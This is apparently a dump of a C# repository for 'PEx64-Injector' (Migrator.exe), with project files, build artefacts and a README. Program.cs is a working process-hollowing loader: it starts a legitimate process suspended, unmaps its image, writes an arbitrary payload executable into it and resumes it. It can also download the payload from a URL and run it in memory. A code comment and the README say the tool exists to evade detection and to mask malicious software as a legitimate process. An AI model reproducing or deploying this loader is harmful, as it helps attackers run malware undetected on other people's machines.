[
  {
    "path": "PEx64-Injector/App.config",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<configuration>\r\n    <startup> \r\n        \r\n    <supportedRuntime version=\"v2.0.50727\"/></startup>\r\n</configuration>\r\n"
  },
  {
    "path": "PEx64-Injector/PEx64-Injector.csproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <Import Project=\"$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props\" Condition=\"Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')\" />\r\n  <PropertyGroup>\r\n    <Configuration Condition=\" '$(Configuration)' == '' \">Debug</Configuration>\r\n    <Platform Condition=\" '$(Platform)' == '' \">AnyCPU</Platform>\r\n    <ProjectGuid>{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}</ProjectGuid>\r\n    <OutputType>Exe</OutputType>\r\n    <RootNamespace>PEx64_Injector</RootNamespace>\r\n    <AssemblyName>Migrator</AssemblyName>\r\n    <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>\r\n    <FileAlignment>512</FileAlignment>\r\n    <Deterministic>true</Deterministic>\r\n    <TargetFrameworkProfile />\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' \">\r\n    <PlatformTarget>x64</PlatformTarget>\r\n    <DebugSymbols>true</DebugSymbols>\r\n    <DebugType>full</DebugType>\r\n    <Optimize>false</Optimize>\r\n    <OutputPath>bin\\Debug\\</OutputPath>\r\n    <DefineConstants>\r\n    </DefineConstants>\r\n    <ErrorReport>prompt</ErrorReport>\r\n    <WarningLevel>4</WarningLevel>\r\n    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' \">\r\n    <PlatformTarget>x64</PlatformTarget>\r\n    <DebugType>pdbonly</DebugType>\r\n    <Optimize>false</Optimize>\r\n    <OutputPath>bin\\Release\\</OutputPath>\r\n    <DefineConstants>\r\n    </DefineConstants>\r\n    <ErrorReport>prompt</ErrorReport>\r\n    <WarningLevel>4</WarningLevel>\r\n  </PropertyGroup>\r\n  <PropertyGroup>\r\n    <StartupObject>PEx64_Injector.Program</StartupObject>\r\n  </PropertyGroup>\r\n  <ItemGroup>\r\n    <Reference Include=\"System\" />\r\n    <Reference Include=\"System.Core\" />\r\n    <Reference Include=\"System.Xml.Linq\" />\r\n    <Reference Include=\"System.Data.DataSetExtensions\" />\r\n    <Reference Include=\"Microsoft.CSharp\" />\r\n    <Reference Include=\"System.Data\" />\r\n    <Reference Include=\"System.Net.Http\" />\r\n    <Reference Include=\"System.Xml\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Compile Include=\"Program.cs\" />\r\n    <Compile Include=\"Properties\\AssemblyInfo.cs\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <None Include=\"App.config\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(MSBuildToolsPath)\\Microsoft.CSharp.targets\" />\r\n</Project>"
  },
  {
    "path": "PEx64-Injector/Program.cs",
    "content": "using System;\r\nusing System.IO;\r\nusing System.Net.Http;\r\nusing System.Runtime.InteropServices;\r\nusing System.Threading.Tasks;\r\n\r\nnamespace PEx64_Injector\r\n{\r\n    // Ensure unsafe code is enabled from build options.\r\n    public static class Migrate\r\n    {\r\n        // Special thanks to gigajew.\r\n        #region DllImport\r\n        [DllImport(\"kernel32.dll\")]\r\n        private static extern bool CreateProcess(string lpApplicationName,\r\n                                                 string lpCommandLine,\r\n                                                 IntPtr lpProcessAttributes,\r\n                                                 IntPtr lpThreadAttributes,\r\n                                                 bool bInheritHandles,\r\n                                                 uint dwCreationFlags,\r\n                                                 IntPtr lpEnvironment,\r\n                                                 string lpCurrentDirectory,\r\n                                                 byte[] lpStartupInfo,\r\n                                                 byte[] lpProcessInformation);\r\n\r\n        [DllImport(\"kernel32.dll\")]\r\n        private static extern long VirtualAllocEx(long hProcess,\r\n                                                  long lpAddress,\r\n                                                  long dwSize,\r\n                                                  uint flAllocationType,\r\n                                                  uint flProtect);\r\n\r\n        [DllImport(\"kernel32.dll\")]\r\n        private static extern long WriteProcessMemory(long hProcess,\r\n                                                      long lpBaseAddress,\r\n                                                      byte[] lpBuffer,\r\n                                                      int nSize,\r\n                                                      long written);\r\n\r\n        [DllImport(\"ntdll.dll\")]\r\n        private static extern uint ZwUnmapViewOfSection(long ProcessHandle,\r\n                                                        long BaseAddress);\r\n\r\n        [DllImport(\"kernel32.dll\")]\r\n        private static extern bool SetThreadContext(long hThread,\r\n                                                    IntPtr lpContext);\r\n\r\n        [DllImport(\"kernel32.dll\")]\r\n        private static extern bool GetThreadContext(long hThread,\r\n                                                    IntPtr lpContext);\r\n\r\n        [DllImport(\"kernel32.dll\")]\r\n        private static extern uint ResumeThread(long hThread);\r\n\r\n        [DllImport(\"kernel32.dll\")]\r\n        private static extern bool CloseHandle(long handle);\r\n        #endregion\r\n\r\n        public static void Load(byte[] payloadBuffer, string host, string args)\r\n        {\r\n            int e_lfanew = Marshal.ReadInt32(payloadBuffer, 0x3c);\r\n            int sizeOfImage = Marshal.ReadInt32(payloadBuffer, e_lfanew + 0x18 + 0x038);\r\n            int sizeOfHeaders = Marshal.ReadInt32(payloadBuffer, e_lfanew + 0x18 + 0x03c);\r\n            int entryPoint = Marshal.ReadInt32(payloadBuffer, e_lfanew + 0x18 + 0x10);\r\n\r\n            short numberOfSections = Marshal.ReadInt16(payloadBuffer, e_lfanew + 0x4 + 0x2);\r\n            short sizeOfOptionalHeader = Marshal.ReadInt16(payloadBuffer, e_lfanew + 0x4 + 0x10);\r\n\r\n            long imageBase = Marshal.ReadInt64(payloadBuffer, e_lfanew + 0x18 + 0x18);\r\n\r\n            byte[] bStartupInfo = new byte[0x68];\r\n            byte[] bProcessInfo = new byte[0x18];\r\n\r\n            IntPtr pThreadContext = Allocate(0x4d0, 16);\r\n\r\n            string targetHost = host;\r\n            if (!string.IsNullOrEmpty(args))\r\n                targetHost += \" \" + args;\r\n            string currentDirectory = Directory.GetCurrentDirectory();\r\n\r\n            Marshal.WriteInt32(pThreadContext, 0x30, 0x0010001b);\r\n\r\n            CreateProcess(null, targetHost, IntPtr.Zero, IntPtr.Zero, true, 0x4u, IntPtr.Zero, currentDirectory, bStartupInfo, bProcessInfo);\r\n            long processHandle = Marshal.ReadInt64(bProcessInfo, 0x0);\r\n            long threadHandle = Marshal.ReadInt64(bProcessInfo, 0x8);\r\n\r\n            ZwUnmapViewOfSection(processHandle, imageBase);\r\n            VirtualAllocEx(processHandle, imageBase, sizeOfImage, 0x3000, 0x40);\r\n            WriteProcessMemory(processHandle, imageBase, payloadBuffer, sizeOfHeaders, 0L);\r\n\r\n            for (short i = 0; i < numberOfSections; i++)\r\n            {\r\n                byte[] section = new byte[0x28];\r\n                Buffer.BlockCopy(payloadBuffer, e_lfanew + (0x18 + sizeOfOptionalHeader) + (0x28 * i), section, 0, 0x28);\r\n\r\n                int virtualAddress = Marshal.ReadInt32(section, 0x00c);\r\n                int sizeOfRawData = Marshal.ReadInt32(section, 0x010);\r\n                int pointerToRawData = Marshal.ReadInt32(section, 0x014);\r\n\r\n                byte[] bRawData = new byte[sizeOfRawData];\r\n                Buffer.BlockCopy(payloadBuffer, pointerToRawData, bRawData, 0, bRawData.Length);\r\n\r\n                WriteProcessMemory(processHandle, imageBase + virtualAddress, bRawData, bRawData.Length, 0L);\r\n            }\r\n\r\n            GetThreadContext(threadHandle, pThreadContext);\r\n\r\n            byte[] bImageBase = BitConverter.GetBytes(imageBase);\r\n\r\n            long rdx = Marshal.ReadInt64(pThreadContext, 0x88);\r\n            WriteProcessMemory(processHandle, rdx + 16, bImageBase, 8, 0L);\r\n\r\n            Marshal.WriteInt64(pThreadContext, 0x80 /* rcx */, imageBase + entryPoint);\r\n\r\n            SetThreadContext(threadHandle, pThreadContext);\r\n            ResumeThread(threadHandle);\r\n\r\n            Marshal.FreeHGlobal(pThreadContext);\r\n            CloseHandle(processHandle);\r\n            CloseHandle(threadHandle);\r\n        }\r\n\r\n        private static IntPtr Align(IntPtr source, int alignment)\r\n        {\r\n            long source64 = source.ToInt64() + (alignment - 1);\r\n            long aligned = alignment * (source64 / alignment);\r\n            return new IntPtr(aligned);\r\n        }\r\n\r\n        private static IntPtr Allocate(int size, int alignment)\r\n        {\r\n            IntPtr allocated = Marshal.AllocHGlobal(size + (alignment / 2));\r\n            return Align(allocated, alignment);\r\n        }\r\n    }\r\n\r\n    // added new feature, download the executable from url in order to evade detection.\r\n    class Program\r\n    {\r\n        static async Task Main(string[] args)\r\n        {\r\n            try\r\n            {\r\n                if (args.Length < 2)\r\n                {\r\n                    Console.WriteLine(\"\\n\\n[*] Developed By 0xyg3n\\n\\n[!] Invalid Arguments Specified..\\n\\n[*] Usage: Migrator.exe payload(fpath or URL) migratefile(fpath)\\n\\n[*] Example: Migrator.exe C:\\\\Users\\\\User\\\\Desktop\\\\Putty64.exe C:\\\\Windows\\\\System32\\\\notepad.exe\\n[*] Example: Migrator.exe https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe C:\\\\Windows\\\\System32\\\\notepad.exe\\n\\n\");\r\n                    Environment.Exit(0);\r\n                }\r\n                else\r\n                {\r\n                    // The file you want to inject (payload).\r\n                    string payload = args[0];\r\n                    // The executable you want to inject to (hostfile).\r\n                    string migratefile = args[1];\r\n\r\n                    byte[] payloadData;\r\n\r\n                    // Check if the payload is a URL or a file path\r\n                    if (Uri.IsWellFormedUriString(payload, UriKind.Absolute))\r\n                    {\r\n                        // Download the file directly into memory\r\n                        payloadData = await DownloadFileAsync(payload);\r\n                        Console.WriteLine(\"[*] Downloaded payload from URL.\");\r\n                    }\r\n                    else\r\n                    {\r\n                        // Read the payload from the file\r\n                        payloadData = File.ReadAllBytes(payload);\r\n                        Console.WriteLine(\"[*] Loaded payload from file.\");\r\n                    }\r\n\r\n                    string arguments = \"\"; // Arguments can be added if needed.\r\n                    Migrate.Load(payloadData, migratefile, arguments);\r\n                    Console.WriteLine(\"\\n\\n[*] Migrated Successfully!\");\r\n                }\r\n            }\r\n            catch (Exception ex)\r\n            {\r\n                Console.WriteLine(\"\\n\\n[*] Migration Failed: \" + ex.Message);\r\n            }\r\n        }\r\n\r\n        static async Task<byte[]> DownloadFileAsync(string url)\r\n        {\r\n            using (HttpClient client = new HttpClient())\r\n            {\r\n                // Send a GET request\r\n                HttpResponseMessage response = await client.GetAsync(url);\r\n                response.EnsureSuccessStatusCode(); // Throw if not a success code.\r\n\r\n                // Read the response content as a byte array\r\n                return await response.Content.ReadAsByteArrayAsync();\r\n            }\r\n        }\r\n    }\r\n}\r\n"
  },
  {
    "path": "PEx64-Injector/Properties/AssemblyInfo.cs",
    "content": "using System.Reflection;\r\nusing System.Runtime.CompilerServices;\r\nusing System.Runtime.InteropServices;\r\n\r\n// General Information about an assembly is controlled through the following\r\n// set of attributes. Change these attribute values to modify the information\r\n// associated with an assembly.\r\n[assembly: AssemblyTitle(\"Migrator\")]\r\n[assembly: AssemblyDescription(\"\")]\r\n[assembly: AssemblyConfiguration(\"\")]\r\n[assembly: AssemblyCompany(\"\")]\r\n[assembly: AssemblyProduct(\"Migrator\")]\r\n[assembly: AssemblyCopyright(\"Copyright ©  2021\")]\r\n[assembly: AssemblyTrademark(\"\")]\r\n[assembly: AssemblyCulture(\"\")]\r\n\r\n// Setting ComVisible to false makes the types in this assembly not visible\r\n// to COM components.  If you need to access a type in this assembly from\r\n// COM, set the ComVisible attribute to true on that type.\r\n[assembly: ComVisible(false)]\r\n\r\n// The following GUID is for the ID of the typelib if this project is exposed to COM\r\n[assembly: Guid(\"9b7c391a-64df-4ac0-b9a2-ccff85c13c26\")]\r\n\r\n// Version information for an assembly consists of the following four values:\r\n//\r\n//      Major Version\r\n//      Minor Version\r\n//      Build Number\r\n//      Revision\r\n//\r\n// You can specify all the values or you can default the Build and Revision Numbers\r\n// by using the '*' as shown below:\r\n// [assembly: AssemblyVersion(\"1.0.*\")]\r\n[assembly: AssemblyVersion(\"1.0.0.0\")]\r\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\r\n"
  },
  {
    "path": "PEx64-Injector/bin/Debug/PEx64-Injector.exe.config",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<configuration>\r\n    <startup> \r\n        \r\n    <supportedRuntime version=\"v2.0.50727\"/></startup>\r\n</configuration>\r\n"
  },
  {
    "path": "PEx64-Injector/obj/Debug/PEx64-Injector.csproj.CopyComplete",
    "content": ""
  },
  {
    "path": "PEx64-Injector/obj/Debug/PEx64-Injector.csproj.CoreCompileInputs.cache",
    "content": "f46e055aec20c3162c4322410157d7c3b875bf13\n"
  },
  {
    "path": "PEx64-Injector/obj/Debug/PEx64-Injector.csproj.FileListAbsolute.txt",
    "content": "C:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\mscorlib.dll\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\el\\mscorlib.resources.dll\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\sortkey.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\sorttbls.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\big5.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\bopomofo.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\ksc.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\prc.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\prcp.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\xjis.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\normidna.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\normnfc.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\normnfd.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\normnfkc.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\normnfkd.nlp\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\obj\\Debug\\PEx64-Injector.csprojAssemblyReference.cache\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\obj\\Debug\\PEx64-Injector.csproj.CoreCompileInputs.cache\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\obj\\Debug\\PEx64-Injector.csproj.CopyComplete\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\Migrator.exe.config\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\Migrator.exe\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\bin\\Debug\\Migrator.pdb\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\obj\\Debug\\Migrator.exe\nC:\\Users\\dev\\Downloads\\PEx64-Injector-main\\PEx64-Injector-main\\PEx64-Injector\\obj\\Debug\\Migrator.pdb\n"
  },
  {
    "path": "PEx64-Injector.sln",
    "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.30517.126\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}\") = \"PEx64-Injector\", \"PEx64-Injector\\PEx64-Injector.csproj\", \"{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|Any CPU = Debug|Any CPU\r\n\t\tRelease|Any CPU = Release|Any CPU\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}.Debug|Any CPU.ActiveCfg = Debug|Any CPU\r\n\t\t{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}.Debug|Any CPU.Build.0 = Debug|Any CPU\r\n\t\t{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}.Release|Any CPU.ActiveCfg = Release|Any CPU\r\n\t\t{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}.Release|Any CPU.Build.0 = Release|Any CPU\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {6AF2CB4F-B286-4111-A866-D6112C476488}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "README.md",
    "content": "> # PEx64-Injector (Process Migrator) + Download Execute In Memory [Updated 23/10/2024]\n> #### Inject any x64 exe to any x64 process ~~(Net FrameWork 3.5)~~ Upgraded to : Net FrameWork 4.7.2 Directly from the Internet or Locally, without touching the disk.\n> #### No Administrator privileges required.\n> ##### GIF Demo\n> ![PoC](https://i.imgur.com/gILIbbd.gif)\n> ### How can be used?\n> ![shot](https://i.imgur.com/0EGhY2r.png)\n> #### Download [here](https://github.com/0xyg3n/PEx64-Injector/releases/tag/1.0).\n> #### Usage: Migrator.exe \"localfilePath(Lpath)\" or \"direct URL\" \"Legitfile(fpath)\"\n> #### Usage Example: 1. Migrator.exe \"C:\\Users\\User\\Desktop\\Putty64.exe\" \"C:\\Windows\\System32\\notepad.exe\"\n> #### Usage Example: 2. Migrator.exe \"https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe\" \"C:\\Windows\\System32\\notepad.exe\"\n> #### Keep as a note that when you specify the migratefile it will launch as a new process and won't migrate to an already running process.\n> #### Such tool can be utilized for AV evasion, masking malicious software under legitimate process.\n![Code](https://i.imgur.com/OTyHK8b.png)\n\n###### Special thanks to [GigaJew](https://github.com/gigajew/).\n______________________\n"
  }
]